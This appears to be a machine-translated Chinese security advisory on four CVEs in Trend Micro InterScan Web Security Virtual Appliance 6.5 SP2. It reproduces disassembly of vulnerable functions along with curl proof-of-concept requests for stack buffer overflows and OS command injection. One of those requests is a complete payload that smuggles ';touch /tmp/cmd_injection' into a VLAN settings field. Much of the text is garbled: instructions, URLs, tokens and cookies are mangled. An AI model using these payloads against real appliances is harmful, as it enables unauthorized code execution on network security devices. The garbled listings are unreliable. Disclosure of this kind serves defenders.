趋势微信网安全虚拟应用程序6.5服务打包2中可确定多重漏洞
CVE-2020-28578:非认证远程栈缓冲溢出
Java_com_trend_iwss_gui_IWSJNI_DecryptPasswd函数libuauit
.text.0001EC00Java_com_trend_iwss_gui_IWSJNI_DecryptPasswdprec近.text.0001EC00text0100Cvar_4dwordptr-4.0unwind {.text.0001EC00子esp,42Ch.text.0001EC06mv[esp+42C+Ver_C],esi.text.Text.0001EC0Dmovesi,sp+42Ch+arg_jniEnv].text.0001EC14edx,[esp+42C+arg_jstringPassword]attacker-controlled .text:0001EC1B mov [esp+42Ch+var_10], ebx .text:0001EC22 mov [esp+42Ch+var_8], edi .text:0001EC29 lea edi, [esp+42Ch+var_41C] .text:0001EC2D mov [esp+42Ch+var_4], ebp .text:0001EC34 mov eax, [esi] .text:0001EC36 call sub_1978D .text:0001EC3B add ebx, 60FA9h .text:0001EC41 mov [esp+42Ch+src], edx .text:0001EC45 mov [esp+42Ch+var_424], 0 .text:0001EC4D mov [esp+42Ch+dest], esi .text:0001EC50 convert jstring to *char .text:0001EC50 call [eax+JNIEnv.GetStringUTFChars] .text:0001EC56 mov [esp+42Ch+dest], edi !定尺寸栈桶->栈溢出.text.0001EC59mvsrc攻击者控件.text.0001EC5Debp,eax.text.0001EC5F调用_strcpy
概念证明
非认证远程攻击者通过向 URL/Rest/Windows_client_stative
curl-ski-di=localhost&basy= true&encry=false&password=$
:8443/rest/windows_client_status
攻击者有可能实现远程代码执行
CVE-2020-28579:验证远程栈缓冲溢出
ibuiauitil邮件通知函数中存在缺陷.so
.text.00048950邮件通知CODE XREF:邮件通知DATAXREF:0005C10o.text.004.089.got.plt:off_803F8↓o .text:00048950 .text:00048950 buf= dword ptr -564Ch .text:00048950 c = dword ptr -5648h .text:00048950 n = dword ptr -5644h .text:00048950 var_5634= dword ptr -5634h .text:00048950 var_5630= dword ptr -5630h .text:00048950 var_562C= byte ptr -562Ch .text:00048950 var_542C= byte ptr -542Ch .text:00048950 var_502C= byte ptr -502Ch .text:00048950 dest= byte ptr -3C2Ch .text:00048950 var_282C= dword ptr -282Ch .text:00048950 var_2828= byte ptr -2828h .text:00048950 var_1428= dword ptr -1428h .text:00048950 var_1424= byte ptr -1424h .text:00048950 arg_mail_queue_path= dword ptr 4 .text:00048950 arg_sender_addr= dword ptr 8 .text:00048950 arg_trendlab_addr= dword ptr 0Ch .text:00048950 arg_mailsubject= dword ptr 10h .text:00048950 arg_bodymsg= dword ptr 14h .text:00048950 .text:00048950 !unwind {.text.00048950推送edi.text.0008952推送esi.text.00088953推送ebx.text.00048954调用sub_1978D.text.00048959 加载ebx,3728Bh.text:0004895Fsuesp,563Ch.text.tle004896leaeax,[esp+564C+dest].text:0004896C movsp+564C+Var_542C].text:0004897B movsp+564Ch+bufs.text.004.8986调用_memset.text:0004898B moveax攻击者控制 src数据.text.004.8996leaeax,[esp+564Ch+dest].text:0004899D mov[esp+564Ch+buf]eax定尺寸栈桶->栈溢出.text.00489A0调用_strat
概念证明
验证远程攻击者通过向HTTP8443端口 URL/urlf_rescripiturl.jsp发送特制HTTP消息来利用漏洞
a) 低特权登录报告用户账号curl-ski-d
Pwd=Log+On'
ilogonsubmit.jspHTTP1.1302发现缓存控件:Not-cache内容-Length:0内容-ype:text/html;charset=UTF-8日期:Frii,24Jul20202014:44GMT
:8443/index.jsp?CSRFGuardToken=55MYNQKMBK8KC3EB9TXC3FKOQH372OGX&summary_scan Pragma: no-cache Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B3C8680FE9EEE804422FD8813D58496A!路径=/安全安全tplyb)带有效证书和CSRFGuardTokencurl-ski-cookie 'JSESIID=B3C8680FE9EEEEE804422FD8813D58496A'-d=send&url=Myell&ender_Note=MySendnote&mailsubject=MyMailSubjects-sender_adr=$
elfk/recligiturl.jsp?CSRFGToken=55MYNQKMBK8KC3EB9TXC3FQH372OGX
CVE-2020-28580:
Java_com_trend_iwss_gui_IWSJNI_AddVLAN
.text.002.0620leaeax/sr/iws/AdminUI/ui_ctl.sh.text.0020626 mov[esp+24Ch+param4],eax.text.02062Aleaeaxs加VLAN项目%s.text.0020630 mv[esp+24C+param1],edx.text.0020633m5攻击者控制字符串.text.0020637mv格式.text.002063Bmvs+24Ch+param2最大值.text.002064CmevexChar*.text.002065调用系统_with_fd_闭合
概念证明
验证远程攻击者通过向 URL/servlet/com.trend.iwss.gui.servlet.ManageVLANSettings
a) 高特权账号curl-ski-d
Pwd=Log+On'
ilogonsubmit.jspHTTP1.1302发现缓存控件:Not-cache内容-Length:0内容-ype:text/html;charset=UTF-8日期:Sat,25Jul202001:32:57GMT定位点:
:8443/index.jsp?CSRFGuardToken=J4GIIPQZUU8896UP9P566UHSU54O30UX&summary_scan Pragma: no-cache Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E96E748E079915805B771A2F1E38D63E!路径=/安全安全htp单b)带有效证书攻击-ski-cookie 'JSSIONID=E96E748E079905B771A2F1E38D63E'-dCSRFGOardToken=J4GIIPUU8896UUULIP9P566UHSUO30UX&Action=MyIP&submask=MySubsk&port=MyPort&id
servlet/com.trend.iwsss.servlet.manageVLANSettings
CVE-2020-28581:
Java_com_trend_iwss_gui_IWSJNI_modififyVLAN
text02088Deax,[sp+24C+220].text020891leaex攻击者控制字符串.text.002089ss+24C+param2最大值.text.00208A4 mev[sp+24C+param6],eax.text.00208A8leaeaxsetvlanitin-7FBE4hs s setVLANUTES%s%d.text.0208B8mvsnprintf.text.00208C5leaeaxsChar*.text.00208C调用系统_with_fd_闭合
概念证明
验证远程攻击者通过向 URL/servlet/com.trend.iwss.gui.servlet.ManageVLANSettings
a) 高特权账号curl-ski-d
Pwd=Log+On'
ilogonsubmit.jspHTTP1.1302发现缓存控件:Not-cache内容-Length:0内容-ype:text/html;charset=UTF-8日期:Sat,25Jul202003:37:45GMT
:8443/index.jsp?CSRFGuardToken=K26DCQZV520QQRB7PXU1ZLEL9RB1KRT8&summary_scan Pragma: no-cache Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=2867F790DE0F3B0445967CDEF6D9F609!路径=/安全安全HttpOnly b) Attack with valid credentials and CSRFGuardToken curl -ski --cookie 'JSESSIONID=2867F790DE0F3B0445967CDEF6D9F609' -d 'CSRFGuardToken=K26DCQZV520QQRB7PXU1ZLEL9RB1KRT8&action=modify&oldip=MyOldIp&oldsubmask=MyOldSubMask&oldport=MyOldPort&oldid=MyOldId&ip=MyIp&submask=MySubMask&port=MyPort&id=MyId;touch /tmp/cmd_injection' https://
:8443/servlet/com.trend.iwss.gui.servlet.ManageVLANSettings
攻击者可任意执行OS命令并拥有Iscan账号权限